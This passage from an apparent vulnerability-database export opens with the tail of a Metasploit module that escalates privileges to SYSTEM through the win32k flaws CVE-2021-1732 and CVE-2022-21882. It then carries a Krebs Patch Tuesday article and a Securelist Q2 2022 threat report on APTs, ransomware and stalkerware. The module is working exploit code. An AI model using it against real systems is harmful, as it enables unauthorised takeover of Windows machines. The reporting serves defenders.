Msf::Post::Windows::ReflectiveDLLInjection \nprepend Msf::Exploit::Remote::AutoCheck \n \ninclude Msf::Exploit::Deprecated \nmoved_from 'exploit/windows/local/cve_2021_1732_win32k' \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'Win32k ConsoleControl Offset Confusion', \n'Description' => %q{ \nA vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of \nNT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being \ntreated as an offset despite being populated by an attacker-controlled value. This can be leveraged to \nachieve an out of bounds write operation, eventually leading to privilege escalation. \n \nThis flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. \nIn early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is \nis the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to \nfunction on a wider range of Windows 10 targets. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n# CVE-2021-1732 \n'BITTER APT', # exploit as used in the wild \n'JinQuan', # detailed analysis \n'MaDongZe', # detailed analysis \n'TuXiaoYi', # detailed analysis \n'LiHao', # detailed analysis \n# CVE-2022-21882 \n'L4ys', # github poc \n# both CVEs \n'KaLendsi', # github pocs \n# Metasploit exploit \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => { \n'EXITFUNC' => 'thread' \n}, \n'Targets' => [ \n[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => { \n'DisableNops' => true \n}, \n'References' => [ \n# CVE-2021-1732 references \n[ 'CVE', '2021-1732' ], \n[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ], \n[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ], \n[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ], \n# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit \n[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ], \n[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ], \n[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ], \n[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ], \n# CVE-2022-21882 references \n[ 'CVE', '2022-21882' ], \n[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ], \n[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ] \n], \n'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n'SideEffects' => [] \n} \n} \n) \n) \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n \nunless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044) \nprint_error('The exploit only supports Windows 10 versions 1803 - 21H2') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86 \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nencoded_payload = payload.encoded \nexecute_dll( \n::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'), \n[encoded_payload.length].pack('I<') + encoded_payload \n) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/166169/cve_2022_21882_win32k.rb.txt"}], "krebs": [{"lastseen": "2022-05-20T03:29:17", "description": "**Microsoft **today released updates to fix at least 74 separate security problems in its **Windows **operating systems and related software. This month&#x27;s patch batch includes fixes for seven &quot;critical&quot; flaws, as well as a zero-day vulnerability that affects all supported versions of Windows.\n\n\n\nBy all accounts, the most urgent bug Microsoft addressed this month is [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>), a weakness in a central component of Windows security (the &quot;**Local Security Authority**&quot; process within Windows). CVE-2022-26925 was publicly disclosed prior to today, and Microsoft says it is now actively being exploited in the wild. The flaw affects Windows 7 through 10 and Windows Server 2008 through 2022.\n\n**Greg Wiseman**, product manager for **Rapid7**, said Microsoft has rated this vulnerability as important and assigned it a CVSS (danger) score of 8.1 (10 being the worst), although Microsoft notes that the CVSS score can be as high as 9.8 in certain situations.\n\n&quot;This allows attackers to perform a man-in-the-middle attack to force domain controllers to authenticate to the attacker using NTLM authentication,&quot; Wiseman said. &quot;This is very bad news when used in conjunction with an NTLM relay attack, potentially leading to remote code execution. This bug affects all supported versions of Windows, but Domain Controllers should be patched on a priority basis before updating other servers.&quot;\n\nWiseman said the most recent time Microsoft patched a similar vulnerability -- last August in [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>) -- it was also being exploited in the wild under the name &quot;[PetitPotam](<https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>).&quot;\n\n&quot;CVE-2021-36942 was so bad it made CISA\u2019s [catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>),&quot; Wiseman said.\n\nSeven of the flaws fixed today earned Microsoft&#x27;s most-dire &quot;critical&quot; label, which it assigns to vulnerabilities that can be exploited by malware or miscreants to remotely compromise a vulnerable Windows system without any help from the user.\n\nAmong those is [CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>), which carries a CVSS score of 9.8, and affects services using the **Windows Network File System** (NFS). **Trend Micro&#x27;s Zero Day Initiative** notes that this bug could allow remote, unauthenticated attackers to execute code in the context of the Network File System (NFS) service on affected systems.\n\n&quot;NFS isn\u2019t on by default, but it\u2019s prevalent in environment where Windows systems are mixed with other OSes such as Linux or Unix,&quot; ZDI&#x27;s **Dustin Childs** [wrote](<https://www.zerodayinitiative.com/blog/2022/5/10/the-may-2022-security-update-review>). &quot;If this describes your environment, you should definitely test and deploy this patch quickly.&quot;\n\nOnce again, this month&#x27;s Patch Tuesday is sponsored by **Windows Print Spooler**, a core Windows service that keeps spooling out the security hits. May&#x27;s patches include four fixes for Print Spooler, including two information disclosure and two elevation of privilege flaws.\n\n&quot;All of the flaws are rated as important, and two of the three are considered more likely to be exploited,&quot; said **Satnam Narang**, staff research engineer at **Tenable**. &quot;Windows Print Spooler continues to remain a valuable target for attackers since [PrintNightmare was disclosed nearly a year ago](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>). Elevation of Privilege flaws in particular should be carefully prioritized, as we\u2019ve seen ransomware groups like Conti favor them as part of its playbook.&quot;\n\nOther Windows components that received patches this month include **.NET** and **Visual Studio**, **Microsoft Edge** (Chromium-based), **Microsoft Exchange Server**, **Office,** **Windows Hyper-V**,** Windows Authentication Methods**, **BitLocker**, **Remote Desktop Client**, and **Windows Point-to-Point Tunneling Protocol**.\n\nAlso today, Adobe issued five security bulletins to address at least 18 flaws in **Adobe CloudFusion**, **Framemaker**, **InCopy**, **InDesign**, and **Adobe Character Animator**. Adobe said it is not aware of any exploits in the wild for any of the issues addressed in today&#x27;s updates.\n\nFor a more granular look at the patches released by Microsoft today and indexed by severity and other metrics, check out the [always-useful Patch Tuesday roundup](<https://isc.sans.edu/forums/diary/Microsoft+May+2022+Patch+Tuesday/28632/>) from the **SANS Internet Storm Center**. And it\u2019s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: [AskWoody.com](<https://www.askwoody.com>) usually has the skinny on any patches that may be causing problems for Windows users.\n\nAs always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these patches, please drop a note about it here in the comments.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-11T02:34:59", "type": "krebs", "title": "Microsoft Patch Tuesday, May 2022 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942", "CVE-2022-26925", "CVE-2022-26937"], "modified": "2022-05-11T02:34:59", "id": "KREBS:5FA70C019AB463F5E02A97C6891685D8", "href": "https://krebsonsecurity.com/2022/05/microsoft-patch-tuesday-may-2022-edition/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2022-08-15T12:01:45", "description": "\n\n * **IT threat evolution in Q2 2022**\n * [IT threat evolution in Q2 2022. Non-mobile statistics](<https://securelist.com/it-threat-evolution-in-q2-2022-non-mobile-statistics/107133/>)\n * [IT threat evolution in Q2 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q2-2022-mobile-statistics/107123/>)\n\n## Targeted attacks\n\n### New technique for installing fileless malware\n\nEarlier this year, we [discovered a malicious campaign](<https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/>) that employed a new technique for installing fileless malware on target machines by injecting a shellcode directly into Windows event logs. The attackers were using this to hide a last-stage Trojan in the file system.\n\nThe attack starts by driving targets to a legitimate website and tricking them into downloading a compressed RAR file that is booby-trapped with the network penetration testing tools Cobalt Strike and SilentBreak. The attackers use these tools to inject code into any process of their choosing. They inject the malware directly into the system memory, leaving no artifacts on the local drive that might alert traditional signature-based security and forensics tools. While fileless malware is nothing new, the way the encrypted shellcode containing the malicious payload is embedded into Windows event logs is.\n\nThe code is unique, with no similarities to known malware, so it is unclear who is behind the attack.\n\n### WinDealer&#x27;s man-on-the-side spyware\n\nWe recently published [our analysis of WinDealer](<https://securelist.com/windealer-dealing-on-the-side/105946/>): malware developed by the LuoYu APT threat actor. One of the most interesting aspects of this campaign is the group&#x27;s use of a man-on-the-side attack to deliver malware and control compromised computers. A man-on-the-side attack implies that the attacker is able to control the communication channel, allowing them to read the traffic and inject arbitrary messages into normal data exchange. In the case of WinDealer, the attackers intercepted an update request from completely legitimate software and swapped the update file with a weaponized one.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/28142531/WinDealer_dealing_on_the_side_02.png>)\n\nThe malware does not contain the exact address of the C2 (command-and-control) server, making it harder for security researchers to find it. Instead, it tries to access a random IP address from a predefined range. The attackers then intercept the request and respond to it. To do this, they need constant access to the routers of the entire subnet, or to some advanced tools at ISP level.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/28142736/WinDealer_dealing_on_the_side_05.png>)\n\nThe vast majority of WinDealer&#x27;s targets are located in China: foreign diplomatic organizations, members of the academic community, or companies active in the defense, logistics or telecoms sectors. Sometimes, though, the LuoYu APT group will infect targets in other countries: Austria, the Czech Republic, Germany, India, Russia and the US. In recent months, they have also become more interested in businesses located in other East Asian countries and their China-based offices.\n\n### ToddyCat: previously unknown threat actor attacks high-profile organizations in Europe and Asia\n\nIn June, we published [our analysis of ToddyCat](<https://securelist.com/toddycat/106799/>), a relatively new APT threat actor that we have not been able to link to any other known actors. The first wave of attacks, against a limited number of servers in Taiwan and Vietnam, targeted Microsoft Exchange servers, which the threat actor compromised with Samurai, a sophisticated passive backdoor that typically works via ports 80 and 443. The malware allows arbitrary C# code execution and is used alongside multiple modules that let the attacker administer the remote system and move laterally within the targeted network. In certain cases, the attackers have used the Samurai backdoor to launch another sophisticated malicious program, which we dubbed Ninja. This is probably a component of an unknown post-exploitation toolkit exclusively used by ToddyCat.\n\nThe next wave saw a sudden surge in attacks, as the threat actor began abusing the ProxyLogon vulnerability to target organizations in multiple countries, including Iran, India, Malaysia, Slovakia, Russia and the UK.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/21075720/APT_ToddyCat_map.png>)\n\nSubsequently, we observed other variants and campaigns, which we attributed to the same group. In addition to affecting most of the previously mentioned countries, the threat actor targeted military and government organizations in Indonesia, Uzbekistan and Kyrgyzstan. The attack surface in the third wave was extended to desktop systems.\n\n### SessionManager IIS backdoor\n\nIn 2021, we observed a trend among certain threat actors for deploying a backdoor within IIS after exploiting one of the ProxyLogon-type vulnerabilities in Microsoft Exchange. Dropping an IIS module as a backdoor enables threat actors to maintain persistent, update-resistant and relatively stealthy access to the IT infrastructure of a target organization \u2014 to collect emails, update further malicious access or clandestinely manage compromised servers.\n\nWe published our analysis of one such IIS backdoor, called [Owowa](<https://securelist.com/owowa-credential-stealer-and-remote-access/105219/>), last year. Early this year, we investigated another, [SessionManager](<https://securelist.com/the-sessionmanager-iis-backdoor/106868/>). Developed in C++, SessionManager is a malicious [native-code IIS module](<https://docs.microsoft.com/en-us/iis/web-development-reference/native-code-development-overview/creating-native-code-http-modules>). The attackers&#x27; aim is for it to be loaded by some IIS applications, to process legitimate HTTP requests that are continuously sent to the server. This kind of malicious modules usually expects seemingly legitimate but specifically crafted HTTP requests from their operators, triggers actions based on the operators&#x27; hidden instructions and then transparently passes the request to the server for it to be processed just as any other request.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/29125614/The_SessionManager_IIS_backdoor_01.png>)\n\nAs a result, these modules are not easily spotted through common monitoring practices.\n\nSessionManager has been used to target NGOs and government organizations in Africa, South America, Asia, Europe and the Middle East.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/29125927/01-en-the-sessionmanager-iis-backdoor.png>)\n\nWe believe that this malicious IIS module may have been used by the GELSEMIUM threat actor, because of similar victim profiles and the use of a common [OwlProxy](<https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/>) variant.\n\n## Other malware\n\n### Spring4Shell\n\nLate in March, researchers discovered a critical vulnerability (CVE-2022-22965) in Spring, an open-source framework for the Java platform. This is a Remote Code Execution (RCE) vulnerability, allowing an attacker to execute malicious code remotely on an unpatched computer. The vulnerability affects the Spring MVC and Spring WebFlux applications running under version 9 or later of the Java Development Kit. By analogy with the well-known Log4Shell vulnerability, this one was dubbed &quot;Spring4Shell&quot;.\n\nBy the time researchers had reported it to VMware, a proof-of-concept exploit had already appeared on GitHub. It was quickly removed, but it is unlikely that cybercriminals would have failed to notice such a potentially dangerous vulnerability.\n\nYou can find more details, including appropriate mitigation steps, in our [blog post](<https://securelist.com/spring4shell-cve-2022-22965/106239/>).\n\n### Actively exploited vulnerability in Windows\n\nAmong the vulnerabilities fixed in May&#x27;s &quot;Patch Tuesday&quot; update was [one that has been actively exploited in the wild](<https://www.kaspersky.com/blog/windows-actively-exploited-vulnerability-cve-2022-26925/44305/>). The Windows LSA (Local Security Authority) Spoofing Vulnerability ([CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>)) is not considered critical per se. However, when the vulnerability is used in a New Technology LAN Manager (NTLM) relay attack, the combined [CVSSv3](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) score for the attack-chain is 9.8. The vulnerability, which allows an unauthenticated attacker to force domain controllers to authenticate with an attacker&#x27;s server using NTLM, was already being exploited in the wild as a zero-day, making it a priority to patch it.\n\n### Follina vulnerability in MSDT\n\nAt the end of May, researchers with the nao_sec team [reported](<https://twitter.com/nao_sec/status/1530196847679401984>) a new zero-day vulnerability in MSDT (the Microsoft Support Diagnostic Tool) that can be exploited using a malicious Microsoft Office document. The vulnerability, which has been designated as CVE-2022-30190 and has also been dubbed &quot;Follina&quot;, affects all operating systems in the Windows family, both for desktops and servers.\n\nMSDT is used to collect diagnostic information and send it to Microsoft when something goes wrong with Windows. It can be called up from other applications via the special MSDT URL protocol; and an attacker can run arbitrary code with the privileges of the application that called up the MSD: in this case, the permissions of the user who opened the malicious document.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/08064948/01-en-cve-2022-30190.png>)\n\nKaspersky [has observed attempts](<https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/>) to exploit this vulnerability in the wild; and we would expect to see more in the future, including ransomware attacks and data breaches.\n\n### BlackCat: a new ransomware gang\n\nIt was only a matter of time before another ransomware group filled the gap left by REvil and BlackMatter shutting down operations. Last December, advertisements for the services of the ALPHV group, also known as [BlackCat](<https://securelist.com/a-bad-luck-blackcat/106254/>), appeared on hacker forums, claiming that the group had learned from the errors of their predecessors and created an improved version of the malware.\n\nThe BlackCat creators use the ransomware-as-a-service (RaaS) model. They provide other attackers with access to their infrastructure and malicious code in exchange for a cut of the ransom. BlackCat gang members are probably also responsible for negotiating with victims. This is one reason why BlackCat has gained momentum so quickly: all that a &quot;franchisee&quot; has to do is obtain access to the target network.\n\nThe group&#x27;s arsenal comprises several elements. One is the cryptor. This is written in the Rust language, allowing the attackers to create a cross-platform tool with versions of the malware that work both in Windows and Linux environments. Another is the Fendr utility (also known as ExMatter), used to exfiltrate data from the infected infrastructure. The use of this tool suggests that BlackCat may simply be a re-branding of the BlackMatter faction, since that was the only known gang to use the tool. Other tools include the PsExec tool, used for lateral movement on the victim&#x27;s network; Mimikatz, the well-known hacker software; and the Nirsoft software, used to extract network passwords.\n\n### Yanluowang ransomware: how to recover encrypted files\n\nThe name Yanluowang is a reference to the Chinese deity Yanluo Wang, one of the Ten Kings of Hell. This ransomware is relatively recent. We do not know much about the victims, although data from the [Kaspersky Security Network](<https://www.kaspersky.com/ksn>) indicates that threat actor has carried out attacks in the US, Brazil, Turkey and a few other countries.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/15153446/01-en-yanlouwang-ransomware.png>)\n\nThe low number of infections is due to the targeted nature of the ransomware: the threat actor prepares and implements attacks on specific companies only.\n\nOur experts have [discovered a vulnerability that allows files to be recovered](<https://securelist.com/how-to-recover-files-encrypted-by-yanluowang/106332/>) without the attackers&#x27; key \u2014 although only under certain conditions \u2014 with the help of a known-plaintext attack. This method overcomes the encryption algorithm if two versions of the same text are available: one clean and one encrypted. If the victim has clean copies of some of the encrypted files, our upgraded [Rannoh Decryptor](<https://noransom.kaspersky.com/>) can analyze these and recover the rest of the information.\n\nThere is one snag: Yanluowang corrupts files slightly differently depending on their size. It encrypts small (less than 3 GB) files completely, and large ones, partially. So, the decryption requires clean files of different sizes. For files smaller than 3 GB, it is enough to have the original and an encrypted version of the file that are 1024 bytes or more. To recover files larger than 3 GB, however, you need original files of the appropriate size. However, if you find a clean file larger than 3 GB, it will generally be possible to recover both large and small files.\n\n### Ransomware TTPs\n\nIn June, we carried out an [in-depth analysis of the TTPs (tactics, techniques and procedures) (TTPs) of the eight most widespread ransomware families](<https://securelist.com/modern-ransomware-groups-ttps/106824/>): Conti/Ryuk, Pysa, Clop, Hive, Lockbit2.0, RagnarLocker, BlackByte and BlackCat. Our aim was to help those tasked with defending corporate systems to understand how ransomware groups operate and how to protect against their attacks.\n\nThe report includes the following:\n\n * The TTPs of eight modern ransomware groups.\n * A description of how various groups share more than half of their components and TTPs, with the core attack stages executed identically across groups.\n * A cyber-kill chain diagram that combines the visible intersections and common elements of the selected ransomware groups and makes it possible to predict the threat actors&#x27; next steps.\n * A detailed analysis of each technique with examples of how various groups use them, and a comprehensive list of mitigations.\n * SIGMA rules based on the described TTPs that can be applied to SIEM solutions.\n\n### Ransomware trends in 2022\n\nAhead of the Anti-Ransomware Day on May 12, we took the opportunity to outline the tendencies that have characterized ransomware in 2022. In [our report](<https://securelist.com/new-ransomware-trends-in-2022/106457/>), we highlight several trends that we have observed.\n\nFirst, we are seeing more widespread development of cross-platform ransomware, as cybercriminals seek to penetrate complex environments running a variety of systems. By using cross-platform languages such as Rust and Golang, attackers are able to port their code, which allows them to encrypt data on more computers.\n\nSecond, ransomware gangs continue to industrialize and evolve into real businesses by adopting the techniques and processes used by legitimate software companies.\n\nThird, the developers of ransomware are adopting a political stance, involving themselves in the conflict between Russia and Ukraine.\n\nFinally, we offer best practices that organizations should adopt to help them defend against ransomware attacks:\n\n * Keep software updated on all your devices.\n * Focus your defense strategy on detecting lateral movements and data exfiltration.\n * Enable ransomware protection for all endpoints.\n * Install anti-APT and EDR solutions, enabling capabilities for advanced threat discovery and detection, investigation and timely remediation of incidents.\n * Provide your SOC team with access to the latest threat intelligence.\n\n### Emotet&#x27;s return\n\nEmotet has been around for eight years. When it was first discovered in 2014, its main purpose was stealing banking credentials. Subsequently, the malware [underwent numerous transformations](<https://securelist.com/the-chronicles-of-emotet/99660/>) to become one of the most powerful botnets ever. Emotet made headlines in January 2021, when its operations were disrupted through the joint efforts of law enforcement agencies in several countries. This kind of &quot;takedowns&quot; does not necessarily lead to the demise of a cybercriminal operation. It took the cybercriminals almost ten months to rebuild the infrastructure, but Emotet did return in November 2021. At that time, the Trickbot malware was used to deliver Emotet, but it is now spreading on its own through malicious spam campaigns.\n\nRecent Emotet protocol analysis and C2 responses suggest that Emotet is now capable of downloading sixteen additional modules. We were able to retrieve ten of these, including two different copies of the spam module, used by Emotet for stealing credentials, passwords, accounts and emails, and to spread spam.\n\nYou can read our analysis of these modules, as well as statistics on recent Emotet attacks, [here](<https://securelist.com/emotet-modules-and-recent-attacks/106290/>).\n\nEmotet infects both corporate and private computers all around the world. Our telemetry indicates that in the first quarter of 2022, targeted: it mostly targeted users in Italy, Russia, Japan, Mexico, Brazil, Indonesia, India, Vietnam, China, Germany and Malaysia.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12151050/03-en-emotet.png>)\n\nMoreover, we have seen a significant growth in the number of users attacked by Emotet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12150829/02-en-emotet.png>)\n\n### Mobile subscription Trojans\n\nTrojan subscribers are a well-established method of stealing money from people using Android devices. These Trojans masquerade as useful apps but, once installed, silently subscribe to paid services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/10140330/trojans-subscribers-2022-screen-1.jpg>)\n\nThe developers of these Trojans make money through commissions: they get a cut of what the person &quot;spends&quot;. Funds are typically deducted from the cellphone account, although in some cases, these may be debited directly to a bank card. We looked at the most notable examples that we have seen in the last twelve months, belonging to the Jocker, MobOk, Vesub and GriftHorse families.\n\nNormally, someone has to actively subscribe to a service; providers often ask subscribers to enter a one-time code sent via SMS, to counter automated subscription attempts. To sidestep this protection, malware can request permission to access text messages; where they do not obtain this, they can steal confirmation codes from pop-up notifications about incoming messages.\n\nSome Trojans can both steal confirmation codes from texts or notifications, and work around [CAPTCHA](<https://encyclopedia.kaspersky.com/glossary/captcha/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>): another means of protection against automated subscriptions. To recognize the code in the picture, the Trojan sends it to a special CAPTCHA recognition service.\n\nSome malware is distributed through dubious sources under the guise of apps that are banned from official stores, for example, masquerading as apps for downloading content from YouTube or other streaming services, or as an unofficial Android version of GTA5. In addition, they can appear in these same sources as free versions of popular, expensive apps, such as Minecraft.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/05131311/Trojan_subscribers_-10.png>)\n\nOther mobile subscription Trojans are less sophisticated. When run for the first time, they ask the user to enter their phone number, seemingly for login purposes. The subscription is issued as soon as they enter their number and click the login button, and the amount is debited to their cellphone account.\n\nOther Trojans employ subscriptions with recurring payments. While this requires consent, the person using the phone might not realize they are signing up for regular automatic payments. Moreover, the first payment is often insignificant, with later charges being noticeably higher.\n\nYou can read more about this type of mobile Trojan, along with tips on how to avoid falling victim to it, [here](<https://securelist.com/mobile-subscription-trojans-and-their-tricks/106412/>).\n\n### The threat from stalkerware\n\nOver the last four years, we have published annual reports on the stalkerware situation, in particular using data from the [Kaspersky Security Network](<https://www.kaspersky.com/ksn>). This year, our [report](<https://securelist.com/the-state-of-stalkerware-in-2021/106193/>) also included the results of a [survey](<https://media.kasperskydaily.com/wp-content/uploads/sites/86/2021/11/17164103/Kaspersky_Digital-stalking-in-relationships_Report_FINAL.pdf>) on digital abuse commissioned by Kaspersky and several public organizations.\n\nStalkerware provides the digital means for a person to secretly monitor someone else&#x27;s private life and is often used to facilitate psychological and physical violence against intimate partners. The software is commercially available and can access an array of personal data, including device location, browser history, text messages, social media chats, photos and more. It may be legal to market stalkerware, although its use to monitor someone without their consent is not. Developers of stalkerware benefit from a vague legal framework that still exists in many countries.\n\nIn 2021, our data indicated that around 33,000 people had been affected by stalkerware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/08160627/Stalkerware_report_2021_01.png>)\n\nThe numbers were lower than what we had seen for a few years prior to that. However, it is important to remember that the decrease of 2020 and 2021 occurred during successive COVID-19 lockdowns: that is, during conditions that meant abusers did not need digital tools to monitor and control their partners&#x27; personal lives. It is also important to bear in mind that mobile apps represent only one method used by abusers to track someone \u2014 others include tracking devices such as AirTags, laptop applications, webcams, smart home systems and fitness trackers. KSN tracks only the use of mobile apps. Finally, KSN data is taken from mobile devices protected by Kaspersky products: many people do not protect their mobile devices. The [Coalition Against Stalkerware](<https://stopstalkerware.org/>), which brings together members of the IT industry and non-profit companies, believes that the overall number of people affected by this threat might be thirty times higher \u2014 that is around a million people!\n\nStalkerware continues to affect people across the world: in 2021, we observed detections in 185 countries or territories.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/04/12144726/Stalkerware_report_2021_eng_03.jpg>)\n\nJust as in 2020, Russia, Brazil, the US and India were the top four countries with the largest numbers of affected individuals. Interestingly, Mexico had fallen from fifth to ninth place. Algeria, Turkey and Egypt entered the top ten, replacing Italy, the UK and Saudi Arabia, which were no longer in the top ten.\n\nWe would recommend the following to reduce your risk of being targeted:\n\n * Use a unique, complex password on your phone and do not share it with anyone.\n * Try not to leave your phone unattended; and if you have to, lock it.\n * Download apps only from official stores.\n * Protect your mobile device with trustworthy security software and make sure it is able to detect stalkerware.\n\nRemember also that if you discover stalkerware on your phone, dealing with the problem is not as simple as just removing the stalkerware app. This will alert the abuser to the fact that you have become aware of their activities and may precipitate physical abuse. Instead, seek help: you can find a list or organizations that can provide [help and support](<https://stopstalkerware.org/resources/>) on the Coalition Against Stalkerware site.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-15T12:00:34", "type": "securelist", "title": "IT threat evolution Q2 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26925", "CVE-2022-30190"], "modified": "2022-08-15T12:00:34", "id": "SECURELIST:D9AF9603FDB076FD6351B6ED483A4947", "href": "https://securelist.com/it-threat-evolution-q2-2022/107099/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-08T07:56:31", "description": "\n\nAt the end of May, researchers from the nao_sec team [reported](<https://twitter.com/nao_sec/status/1530196847679401984>) a new zero-day vulnerability in Microsoft Support Diagnostic Tool (MSDT) that can 